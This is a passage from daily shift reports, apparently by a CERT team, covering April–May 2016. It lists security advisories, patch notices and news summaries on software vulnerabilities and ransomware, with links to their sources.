*** HPE Network Node Manager i Multiple Flaws Let Remote Users Bypass Authentication, Obtain Data and Potentially Sensitive Information, and Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1035767
*** Bugtraq: ESA-2016-051: Patch 14 for RSA Authentication Manager 8.1 SP1 to Address Multiple Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538287
*** DSA-3567 libpam-sshauth - security update ***
---------------------------------------------
It was discovered that libpam-sshauth, a PAM module to authenticate using an SSH server, does not correctly handle system users. In certain configurations an attacker can take advantage of this flaw to gain root privileges.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3567
*** USN-2963-1: OpenJDK 8 vulnerabilities ***
---------------------------------------------
Ubuntu Security Notice USN-2963-1, 4th May 2016: openjdk-8 vulnerabilities. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 16.04 LTS. Summary: Several security issues were fixed in OpenJDK 8. Software description: openjdk-8 - Open Source Java implementation. Details: Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity, and availability. An attacker could exploit these to cause a denial of service, expose sensitive...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2963-1/
*** USN-2964-1: OpenJDK 7 vulnerabilities ***
---------------------------------------------
Ubuntu Security Notice USN-2964-1, 4th May 2016: openjdk-7 vulnerabilities. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10, Ubuntu 14.04 LTS. Summary: Several security issues were fixed in OpenJDK 7. Software description: openjdk-7 - Open Source Java implementation. Details: Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity, and availability. An attacker could exploit these to cause a denial of service, expose...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2964-1/
*** Cisco security Advisories ***
---------------------------------------------
*** Cisco Adaptive Security Appliance with FirePOWER Services Kernel Logging Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FirePOWER System Software Packet Processing Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco TelePresence XML Application Programming Interface Authentication Bypass Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Finesse HTTP Request Processing Server-Side Request Forgery Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: May 2016 ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in bind affect Power Hardware Management Console (CVE-2016-1285, CVE-2016-1286) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021266
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in ntp affect Power Hardware Management Console (CVE-2015-5300, CVE-2015-7704, CVE-2015-8138) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021264
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM XIV Storage System (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005699
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Performance Tester (CVE-2015-7575, CVE-2016-0475) ***
http://www.ibm.com/support/docview.wss?uid=swg21982445
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Service Tester (CVE-2015-7575, CVE-2016-0475) ***
http://www.ibm.com/support/docview.wss?uid=swg21982446
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Insight (CVE-2015-4872, CVE-2015-4893, CVE-2015-4803, CVE-2015-5006, CVE-2016-0483, CVE-2015-7575, CVE-2016-0448, CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=swg21972468
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Reporting for Development Intelligence (CVE-2015-4872, CVE-2015-4893, CVE-2015-4803, CVE-2015-5006, CVE-2016-0483, CVE-2015-7575, CVE-2016-0448, CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=swg21972469
---------------------------------------------
*** IBM Security Bulletin: IBM Cognos Business Intelligence Server 2016Q1 Security Updater : IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities. ***
http://www.ibm.com/support/docview.wss?uid=swg21979767
---------------------------------------------
*** IBM Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) February 2016 ***
http://www.ibm.com/support/docview.wss?uid=swg21980693
---------------------------------------------
*** IBM Security Bulletin: Current Releases of IBM SDK for Node.js in IBM Bluemix are affected by CVE-2016-3956, CVE-2016-2515 and CVE-2016-2537. ***
http://www.ibm.com/support/docview.wss?uid=swg21981433
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in InstallShield affects IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server (CVE-2016-2542) ***
http://www.ibm.com/support/docview.wss?uid=swg21982467
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in InstallShield affects IBM Tivoli Storage FlashCopy Manager on Windows (CVE-2016-2542) ***
http://www.ibm.com/support/docview.wss?uid=swg21982448
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in SQLite affects IBM Security Access Manager for Mobile (CVE-2015-3416) ***
http://www.ibm.com/support/docview.wss?uid=swg21981269
---------------------------------------------
*** IBM Security Bulletin: IBM SPSS Statistics ActiveX Control Buffer Overflow (CVE-2015-8530) ***
http://www.ibm.com/support/docview.wss?uid=swg21982035
---------------------------------------------
*** IBM Security Bulletin: The GPFS pattern provided with IBM PureApplication System is affected by a security vulnerability. (CVE-2015-7403) ***
http://www.ibm.com/support/docview.wss?uid=swg21982660
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 03-05-2016 18:00 − Wednesday 04-05-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Dev using Libarchive? Patch and push ***
---------------------------------------------
Input validation bug opens code execution vuln. The popular Libarchive open source compression library needs an update to cover a code execution vulnerability.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/05/04/dev_using_l…
*** Security updates: PHP vulnerable to remote code execution ***
---------------------------------------------
Attackers can remotely inject malicious code into various PHP versions. Three patched versions close two security holes.
---------------------------------------------
http://heise.de/-3196826
*** New versions of Apache Struts defend against malicious code ***
---------------------------------------------
Through a security vulnerability, attackers can under certain circumstances remotely attack servers running Apache Struts and execute code.
---------------------------------------------
http://heise.de/-3196868
*** Petya: the two-in-one trojan ***
---------------------------------------------
Petya Trojan is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system.
---------------------------------------------
http://securelist.com/blog/research/74609/petya-the-two-in-one-trojan/
*** Polite ransomware trojan apologises and asks for gifts ***
---------------------------------------------
A new crypto-trojan is going around: the Alpha ransomware demands iTunes gift cards from the victim, otherwise the data stays encrypted with AES-256. The ransom note is surprisingly polite but leaves out important details.
---------------------------------------------
http://heise.de/-3197135
*** Yet Another Padding Oracle in OpenSSL CBC Ciphersuites ***
---------------------------------------------
Yesterday a new vulnerability was announced in OpenSSL/LibreSSL. A padding oracle in CBC mode decryption, to be precise. Just like Lucky13. Actually, it's in the code that fixes Lucky13. It was found by Juraj Somorovsky using a tool he developed called TLS-Attacker. Like in the "old days"...
---------------------------------------------
https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphe…
*** Neutrino exploit kit sends Cerber ransomware, (Wed, May 4th) ***
---------------------------------------------
Introduction: Seems like we're always finding new ransomware. In early March 2016, BleepingComputer announced a new ransomware named Cerber had appeared near the end of February [1]. A few days later, the Malwarebytes blog provided further analysis and more details on subsequent Cerber samples [2]. Cerber is distributed through exploit kits (EKs) and malicious spam (malspam). I've only seen .rtf attachments that download and install Cerber if opened in Microsoft Word [3]. ...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21017
*** Security Advisory: Stored XSS in bbPress ***
---------------------------------------------
Exploitation Level: Easy/Remote
DREAD Score: 6/10
Vulnerability: Stored XSS
Patched Version: bbPress 2.5.9
During regular research audits of our Sucuri Firewall, we discovered a Stored XSS vulnerability affecting the bbPress plugin for WordPress which is currently installed on 300,000 live websites - one of them being the popular wordpress.org support forum. Vulnerability Disclosure Timeline: April...
---------------------------------------------
https://blog.sucuri.net/2016/05/security-advisory-stored-xss-bbpress-2.html
*** Xcode 7.3.1 ***
---------------------------------------------
Available for: OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
---------------------------------------------
https://support.apple.com/kb/HT206338
*** Cisco Prime Collaboration Assurance Open Redirect Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** F5 Security Advisory: Multiple OpenSSL vulnerabilities CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2176 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/07/sol07538415.html?…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427) ***
http://www.ibm.com/support/docview.wss?uid=swg21982223
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Sterling Connect:Direct for UNIX (CVE-2016-0799, CVE-2016-0702). ***
http://www.ibm.com/support/docview.wss?uid=swg21981764
---------------------------------------------
*** IBM Security Bulletin: Potential vulnerabilities in IBM OpenPages GRC Platform with Application Server ***
http://www.ibm.com/support/docview.wss?uid=swg21982462
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=swg21977134
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition affect IBM Tivoli Network Manager IP Edition ***
http://www.ibm.com/support/docview.wss?uid=swg21975424
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM InfoSphere Information Server installer could expose sensitive information (CVE-2015-7493) ***
http://www.ibm.com/support/docview.wss?uid=swg21982034
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Sterling Connect:Direct for UNIX (CVE-2015-3194, CVE-2015-3195). ***
http://www.ibm.com/support/docview.wss?uid=swg21981765
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Cognos Metrics Manager (CVE-2015-2017) ***
http://www.ibm.com/support/docview.wss?uid=swg21976798
---------------------------------------------
*** IBM Security Bulletin: DB2 local escalation of privilege vulnerability affects IBM Tivoli Storage Manager server (CVE-2015-1947) ***
http://www.ibm.com/support/docview.wss?uid=swg21979698
---------------------------------------------
*** IBM Security Bulletin: A security vulnerability has been identified in IBM Tivoli / Security Directory Server ***
http://www.ibm.com/support/docview.wss?uid=swg21980585
---------------------------------------------
Next End-of-Shift report on 2016-05-06
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 02-05-2016 18:00 − Tuesday 03-05-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** GOZNYM MALWARE ***
---------------------------------------------
Antivirus software detects GozNym hybrid as Nymaim variant. GozNym samples resolve domains, do not connect to IPs returned. Separate IP used for HTTP comms. C2 channel for GozNym appears to be HTTP POST requests, in line with ..
---------------------------------------------
https://blog.team-cymru.org/2016/05/goznym-malware/
*** JSA10748 - Protect-RE (loopback) Firewall Filter does not discard OSPF packets from non-permitted prefixes ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10748&actp=RSS
*** Acunetix WVS 10 - Remote command execution (SYSTEM privilege) ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016050003
*** 3-in-4 Android phones, slabs, gizmos menaced by fresh hijack flaws ***
---------------------------------------------
Another month, another round of critical vulnerabilities patched by Google. Google has today issued a bundle of 40 security patches for its Android operating system.
---------------------------------------------
www.theregister.co.uk/2016/05/02/android_may_patch_batch/
*** Fake Security Conferences ***
---------------------------------------------
Turns out there are two different conferences with the title International Conference on Cyber Security (ICCS 2016), one real and one fake. Richard Clayton has the story ..
---------------------------------------------
https://www.schneier.com/blog/archives/2016/05/fake_security_c.html
*** RSA Data Loss Prevention Bugs Let Remote Users Conduct Cross-Site Scripting and Clickjacking Attacks and Let Remote Authenticated Users Bypass Security Controls and Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1035714
*** SNMP Pentesting ***
---------------------------------------------
In the previous article about SNMP, we have discussed how to set up your own vulnerable lab where we have configured pfSense and VyOS with SNMP misconfigurations. You can find this article here. In this article, we will discuss how to assess the security ..
---------------------------------------------
http://resources.infosecinstitute.com/snmp-pentesting/
*** l+f: Website of the Ministry for Digital Infrastructure full of holes again ***
---------------------------------------------
After Heartbleed, now XSS: the web presence of the Federal Ministry of Transport and Digital Infrastructure was once again inadequately secured.
---------------------------------------------
http://heise.de/-3196376
*** OpenSSL Security Advisory [3rd May 2016] ***
---------------------------------------------
https://openssl.org/news/secadv/20160503.txt
*** OpenSSL closes offshoot of the Lucky 13 hole ***
---------------------------------------------
The widely used crypto library receives patches for six security vulnerabilities. Two of them have the priority ..
---------------------------------------------
http://heise.de/-3196510
*** Ransomware deployments after brute force RDP attack ***
---------------------------------------------
Fox-IT has encountered various ways in which ransomware is being spread and activated. Many infections happen by sending spam e-mails and luring the receiver in opening the infected ..
---------------------------------------------
https://blog.fox-it.com/2016/05/02/ransomware-deployments-after-brute-force…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 29-04-2016 18:00 − Monday 02-05-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** DSA-3561 subversion - security update ***
---------------------------------------------
Several vulnerabilities were discovered in Subversion, a version control system. The Common Vulnerabilities and Exposures project identifies the following problems:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3561
*** Google Patches 9 Security Flaws in New Chrome Browser Build ***
---------------------------------------------
Five Chrome bug bounty hunters split $14,000 in rewards as Google patches nine security flaws in its browser, four of which are labeled 'high'.
---------------------------------------------
http://threatpost.com/google-patches-9-security-flaws-in-new-chrome-browser…
*** Cloned Websites Stealing Google Rankings ***
---------------------------------------------
We often speak of black hat SEO tactics and content scraping sites are just one example of such tactics. Scraping is the act of copying all content from a website using automated scripts, usually with the intention of stealing ..
---------------------------------------------
https://blog.sucuri.net/2016/04/cloned-website-stealing-google-rankings-seo…
*** Lizard Squad Ransom Threats: New Name, Same Faux Armada Collective M.O. ***
---------------------------------------------
[...] Beginning late Thursday evening (Pacific Standard Time) several CloudFlare customers began to receive threatening emails from a "new" group calling itself the 'Lizard Squad'. These emails have a similar modus operandi to the previous ransom emails. This group was threatenin ..
---------------------------------------------
https://blog.cloudflare.com/lizard-squad-ransom-threats-new-name-same-faux-…
*** Cyber Security Challenge: competition for "up-and-coming hackers" starts on 2 May ***
---------------------------------------------
As of now, pupils and students are once again invited to take on the online tests of the Cyber Security Challenge. The qualification phase runs until 1 August; the German final takes place at the end of September in Berlin.
---------------------------------------------
http://heise.de/-3194493
*** Crypto-ransomware Gains Footing in Corporate Grounds, Gets Nastier for End Users ***
---------------------------------------------
In the first four months of 2016, we have discovered new families and variants of ransomware, seen their vicious new routines, and witnessed threat actors behind these operations upping the ransomware game to new heights. All these developments further establish crypto-ransomware as a ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/crypto-ransomwar…
*** Black market: price of mobile malware on the rise ***
---------------------------------------------
According to security researchers, the trade in mobile malware is flourishing. The seller of the Android trojan GM Bot is meanwhile raising prices on malware marketplaces noticeably.
---------------------------------------------
http://heise.de/-3195382
*** Practical Reverse Engineering Part 2 - Scouting the Firmware ***
---------------------------------------------
In part 1 we found a debug UART port that gave us access to a linux shell. At this point we've got the same access to the router that a developer would use to debug issues, control the system, etc.
---------------------------------------------
http://jcjc-dev.com/2016/04/29/reversing-huawei-router-2-scouting-firmware/
*** Serious security hole in Ubuntu's new Snap package format closed ***
---------------------------------------------
Ubuntu's new Snap package format is causing a stir again: the developers have now removed a typo in the code that had allowed attackers to execute arbitrary malicious code.
---------------------------------------------
http://heise.de/-3195532
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 28-04-2016 18:00 − Friday 29-04-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** A Dramatic Rise in ATM Skimming Attacks ***
---------------------------------------------
Skimming attacks on ATMs increased at an alarming rate last year for both American and European banks and their customers, according to recent stats collected by fraud trackers. The trend appears to be continuing into 2016, with outbreaks of skimming activity visiting a much broader swath of the United States than in years past.
---------------------------------------------
http://krebsonsecurity.com/2016/04/a-dramatic-rise-in-atm-skimming-attacks/
*** Security: The Internet Minister has Heartbleed ***
---------------------------------------------
The website of the Federal Ministry of Transport and Digital Infrastructure was vulnerable to a critical security hole that was closed almost two years ago. The compromised certificate is still in use. (Heartbleed, encryption)
---------------------------------------------
http://www.golem.de/news/security-der-internetminister-hat-heartbleed-1604-…
*** Numerous access credentials for the messaging service Slack discovered on GitHub ***
---------------------------------------------
The security firm Detectify found over a thousand access tokens for Slack in publicly accessible GitHub repositories.
---------------------------------------------
http://heise.de/-3194000
*** eBay phishers hunt for victims using personal details ***
---------------------------------------------
Particularly perfidious phishing emails in the name of eBay are currently circulating. In the messages, recipients are addressed with their full name and complete postal address.
---------------------------------------------
http://heise.de/-3194026
*** Got ransomware? These tools may help ***
---------------------------------------------
Your computer has been infected by ransomware. All those files -- personal documents, images, videos, and audio files -- are locked up and out of your reach. There may be a way to get those files back without paying a ransom. But first a couple of basic questions: Do you have complete backups? If so, recovery is simply a matter of wiping the machine -- bye bye, ransomware! -- reinstalling your applications, and restoring the data files. It's a little stressful, but doable. Are they good...
---------------------------------------------
http://www.cio.com/article/3063048/security/got-ransomware-these-tools-may-…
*** Sysinternals Updated today - Updates to Sysmon, Procdump and Sigcheck. (Fri, Apr 29th) ***
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21001
https://blogs.technet.microsoft.com/sysinternals/2016/04/28/update-sysmon-v…
*** BIND 9.9.9/9.10.4 released ***
---------------------------------------------
https://lists.isc.org/pipermail/bind-announce/2016-April/000986.html
https://lists.isc.org/pipermail/bind-announce/2016-April/000987.html
https://lists.isc.org/pipermail/bind-announce/2016-April/thread.html
*** DFN-CERT-2016-0686: Jenkins: Two vulnerabilities allow, among other things, bypassing security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0686/
*** [HTB23301]: SQL Injection in GLPI ***
---------------------------------------------
Product: GLPI v0.90.2
Vulnerability Type: SQL Injection [CWE-89]
Risk level: High
Creator: INDEPNET
Advisory Publication: April 8, 2016 [without technical details]
Public Disclosure: April 29, 2016
CVE Reference: Pending
CVSSv2 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Vulnerability Details: High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for...
---------------------------------------------
https://www.htbridge.com/advisory/HTB23301
*** Bugtraq: [security bulletin] HPSBUX03583 SSRT110084 rev.1 - HP-UX BIND Service running Named, Remote Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538219
*** Cisco Information Server XML Parser Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** APPLE-SA-2016-04-28-1 OS X: Flash Player plug-in blocked ***
---------------------------------------------
APPLE-SA-2016-04-28-1 OS X: Flash Player plug-in blocked. Due to security and stability issues in older versions, Apple has updated the web plug-in blocking mechanism to disable all versions prior to Flash Player 21.0.0.226 and 18.0.0.343. Information on blocked web plug-ins will be posted to: [...]
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Apr/msg00000.ht…
*** Moxa NPort Device Vulnerabilities (Update B) ***
---------------------------------------------
This alert update is a follow-up to the NCCIC/ICS-CERT updated alert titled ICS-ALERT-16-099-01A Moxa NPort Device Vulnerabilities that was published April 20, 2016, on the ICS-CERT web page. ICS-CERT is aware of a public report of vulnerabilities affecting multiple models of the Moxa NPort device. These vulnerabilities were reported by Reid Wightman of Digital Bond Labs, who coordinated with the vendor but not with ICS-CERT.
---------------------------------------------
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-099-01
*** SSA-763427 (Last Update 2016-04-29): Vulnerability in Communication Processor (CP) modules SIMATIC CP 343-1, TIM 3V-IE, TIM 4R-IE, and CP 443-1 ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-763427…
*** SSA-921524 (Last Update 2016-04-29): Incorrect Frame Padding in ROS-based Devices ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-921524…
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of IBM® WebSphere Real Time ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21982198
*** IBM Security Bulletin: A vulnerability in IBM WebSphere Application Server affects IBM QuickFile (CVE-2015-2017). ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21977561
*** Bugtraq: [SECURITY] [DSA 3561-1] subversion security update ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538223
*** WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexadecimal IP addresses ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8473
*** WordPress <= 4.4.2 - Reflected XSS in Network Settings ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8474
*** WordPress <= 4.4.2 - Script Compression Option CSRF ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8475
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 27-04-2016 18:00 − Thursday 28-04-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Malware Takes Advantage of Windows "God Mode" ***
---------------------------------------------
Microsoft Windows has hidden an Easter Egg since Windows Vista. It allows users to create a specially named folder that acts as a shortcut to Windows settings and special folders, such as control panels, My Computer, or the printers folder. This "God Mode" can come in handy for admins, but attackers are now using this undocumented feature for evil ends. Files placed within one of these master control panel shortcuts are not easily accessible via Windows Explorer because the folders do...
---------------------------------------------
https://blogs.mcafee.com/mcafee-labs/malware-takes-advantage-of-windows-god…
*** VB2016 Call for Papers Deadline ***
---------------------------------------------
You have until the early hours (GMT) of Monday 21 March to submit an abstract for VB2016! The VB2016 programme will be announced in the first week of April.
---------------------------------------------
https://www.virusbulletin.com/blog/2016/03/vb2016-call-papers-deadline/
*** How broken is SHA-1 really? ***
---------------------------------------------
SHA-1 collisions may be found in the next few months, but that doesn't mean that fake SHA-1-based certificates will be created in the near future. Nevertheless, it is time for everyone, and those working in security in particular, to move away from outdated hash functions.
---------------------------------------------
https://www.virusbulletin.com/blog/2016/03/how-broken-sha-1-really/
*** Firefox 46 Patches Critical Memory Vulnerabilities ***
---------------------------------------------
Mozilla released Firefox 46, which includes patches for one critical and four high-severity vulnerabilities, all of which can lead to remote code execution.
---------------------------------------------
http://threatpost.com/firefox-46-patches-critical-memory-vulnerabilities/11…
*** DNS and DHCP Recon using Powershell, (Thu, Apr 28th) ***
---------------------------------------------
I recently had a client pose an interesting problem. They wanted to move all their thin clients to a separate VLAN. In order to do that, I needed to identify which switch port each was on. Since there were several device vendors involved, I couldn't use the OUI portion of the MAC. Fortunately, they were using only a few patterns in their thin client hostnames, so that gives me an in. Great, you say, use nmap -sn, sweep for the names, get the MAC addresses and map those to switch ports - easy, right?
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20995&rss
*** Time for a patch: six vulns fixed in NTP daemon ***
---------------------------------------------
What's the time? It's time to get ill. Unless you fix these beastly flaws. Cisco has turned over a bunch of Network Time Protocol daemon (ntpd) vulnerabilities to the Linux Foundation's Core Infrastructure Initiative.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/28/time_for_a_…
*** Handling security bugs, vulnerable infrastructure and a range of DDoS attacks: 22nd MELANI semi-annual report ***
---------------------------------------------
In the second half of 2015, there were once again some spectacular cyber-related incidents worldwide. These were primarily DDoS attacks, phishing attacks and attacks on industrial control systems. Published today, the 22nd MELANI semi-annual report features handling security vulnerabilities as its key topic.
---------------------------------------------
https://www.melani.admin.ch/melani/en/home/dokumentation/newsletter/semi-an…
*** Binary Webshell Through OPcache in PHP 7 ***
---------------------------------------------
In this article, we will be looking at a new exploitation technique using the default OPcache engine from PHP 7. Using this attack vector, we can bypass certain hardening techniques that disallow the file write access in the web directory. This could be used by an attacker to execute his own malicious code in a hardened environment.
---------------------------------------------
http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
*** Kaspersky DDoS Intelligence Report for Q1 2016 ***
---------------------------------------------
In Q1, resources in 74 countries were targeted by DDoS attacks. China, the US and South Korea remained the leaders in terms of number of DDoS attacks and number of targets. The longest DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days).
---------------------------------------------
http://securelist.com/analysis/quarterly-malware-reports/74550/kaspersky-dd…
*** Cyber Security Lecture given by Mozilla ***
---------------------------------------------
May 09, 2016, 4:00 pm - 6:30 pm, TU Wien, Karlsplatz 13, 1040 Wien
Let’s Encrypt (J.C. Jones)
You can’t build a secure website without having a certificate, and getting a certificate is one of the hardest parts of setting up a secure website. Mozilla helped start up Let’s Encrypt to make getting a certificate easier and promote the security of the Web. In 16 months, Let’s Encrypt went from an idea...
Mozilla Security (Richard Barnes)
The Web is arguably the single largest platform for applications in the world. Securing a Web browser requires security expertise from across the field, including low-level program internals, network security, language design, and access controls. In this talk, we will discuss some of the critical Web...
---------------------------------------------
https://www.sba-research.org/events/cyber-security-lecture-given-by-mozilla/
*** PCI DSS 3.2 is out: What's new? ***
---------------------------------------------
The Payment Card Industry Security Standards Council has published the latest version of PCI DSS, the information security standard for organizations that handle customer credit cards. Changes and improvements in PCI DSS 3.2 include: Multi-factor authentication will be required for all administrative access into the cardholder data environment. Previously, use of multi-factor authentication was only a must when it was accessed remotely, by an untrusted user/device. This will not impact...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/28/pci-dss-3-2-whats-new/
*** Cisco Finds Backdoor Installed on 12 Million PCs ***
---------------------------------------------
UPDATED. Cisco's Talos security intelligence and research group has come across a piece of software that installed backdoors on 12 million computers around the world.
---------------------------------------------
http://www.securityweek.com/cisco-finds-backdoor-installed-12-million-pcs
*** Forthcoming OpenSSL releases ***
---------------------------------------------
The OpenSSL project team would like to announce the forthcoming release of OpenSSL versions 1.0.2h, 1.0.1t. These releases will be made available on 3rd May 2016 between approximately 1200-1500 UTC. They will fix several security defects with maximum severity "high".
---------------------------------------------
https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html
*** VMSA-2015-0007.4 ***
---------------------------------------------
VMware vCenter and ESXi updates address critical security issues.
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2015-0007.html
*** Bugtraq: CVE-2015-5207 - Bypass of Access Restrictions in Apache Cordova iOS ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538213
*** sol93532943: SSHD session.c vulnerability CVE-2016-3115 ***
---------------------------------------------
Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115)
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/93/sol93532943.html?ref=…
*** sol52349521: OpenSSL vulnerability CVE-2016-2842 ***
---------------------------------------------
The doapr_outch function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not verify that a certain memory allocation succeeds, which allows remote attackers to cause a denial of service (out-of-bounds write or memory consumption) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-0799. (CVE-2016-2842)
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/52/sol52349521.html?ref=…
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Application Policy Infrastructure Controller Enterprise Module Unauthorized Access Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco WebEx Meetings Server Open Redirect Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products: April 2016 ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in Samba - including Badlock - Transformation Extender Hypervisor Edition ***
http://www.ibm.com/support/docview.wss?uid=swg21981057
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in Samba including Badlock - affect IBM OS Images for Red Hat Linux Systems. ***
http://www.ibm.com/support/docview.wss?uid=swg21982097
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in Samba, including Badlock, affect IBM i ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021296
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in php5 affect IBM Flex System Manager (FSM) (CVE-2015-6836, CVE-2015-6837, CVE-2015-6838) ***
